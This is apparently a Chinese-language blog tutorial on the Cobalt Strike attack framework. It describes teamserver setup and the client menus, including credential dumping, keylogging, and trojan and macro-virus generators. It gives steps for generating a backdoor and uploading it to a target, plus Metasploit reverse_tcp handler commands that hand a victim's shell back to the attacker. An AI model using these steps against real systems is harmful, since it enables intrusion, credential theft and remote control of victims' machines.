cobaltstrike简称cs,和msf的用处大致相同,利用已知漏洞直接拿取shell的工具,权限提升和留后门经常用到 @[toc]
cobaltstrike功能分析
cs下有一个文件为teamserver,是为团队协作准备的,运行teamserver 本地IP 登录密码
即可将本机作为服务器供团队使用cs。 在客户端上用bash命令启动cobaltstrike.bat执行jar文件:bash cobaltstrike.bat
,主机为teamserver服务器ip,密码是开启teamserver所用的密码
cs框架
cs下的文件分别具有的作用:
SCRIPTS 用户安装的插件 log 日志 c2lint 检查profile的错误异常 cobaltstrike.jar 客户端程序 icon.jpg LOGO license.pdf 许可证 teamserver 服务端程序 update.jar 更新程序 third-party 第三方工具,放的vnc和dll
-
teamserver端: 服务器只能运行在linux系统中,可搭建在vps
chmod +x teamserver
再./teamserver 服务端IP 连接密码
启动 -
客户端 客户端在windows\linux\mac下都能运行(需提前配置好java)
cs的生成后门只支持windows端的木马
-
Cobalt strike模块:
New connection:新建连接(支持多个服务器端) preferences:偏好设置(界面、控制台、输出报告样式、teamserver连接记录) visualization:窗口视图模式(展示输出结果) VPN Interfaces:VPN接入 listenrs:监听器(创建listener) script manager:脚本管理
-
view模块
Applications #应用(显示受害者机器的应用信息) Credentials #凭证(通过hashdump或Mimikatz抓取过的密码都会储存在这里) Downloads #下载文件 Event Log #事件日志(主机上线记录以及团队协作聊天记录)Keystrokes #键盘记录 Proxy Pivots #代理模块Screenshots #截图Script Console #脚本控制台(可以加载各种脚本,增强功能Targets #显示目标主机 Web Log #Web日志
-
attacks模块
Manage #对开启的web服务进行管理 Clone Site #克隆网站(可记录受害者提交的数据)Host File #提供Web以供下载某文件 Scripted Web Delivery #提供Web服务 Signed Applet Attack #启动Web服务以提供自签名Java Applet的运行环境 Smart Applet Attack #检测Java版本并利用已知的exploits绕过security System Profiler #用来获取一些系统信息,比如系统版本,浏览器版本等 HTML Application #生成恶意的HTA木马文件 MS Office Macro #生成office宏病毒文件 Payload Generator#生成各种语言版本的payload USB/CD AutoPlay #生成利用自动播放运行的木马文件 Windows Dropper #捆绑器,能够对文档类进行捆绑 Windows Executable #生成可执行Payload Windows Executable(S)#把包含payload,Stageless生成可执行文件(包含多数功能)
-
reporting模块
Activity report#活动报告 Hosts report #主机报告 Indicators of Compromise #威胁报告 Sessions report #会话报告 Social engineering report #社会工程学报告 Tactics,Techniques, and Procedures #策略、技巧和程序 Reset Data #重置数据 Export Data #导出数据
生成木马步骤
先在本地设置一个监听器:配置监听->add->选择协议、外网IP和端口 生成后门:attacks->packager->生成后门,将后门上传至靶机 beacon执行命令;beacon->shell+命令 来执行命令
cobalt strike和metasploit组合使用
在metasploit执行: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 本地IP set lport 本地端口 exploit
在cobalt strike执行: 设置监听 payload:windows/foreign/reverse_tcp 监听端口:msf的lport
然后在cs执行以下操作: 选择受害者主机,然后右击spawn 选择监听者:msf(刚开始新建的监听名字)
shell会反弹到msf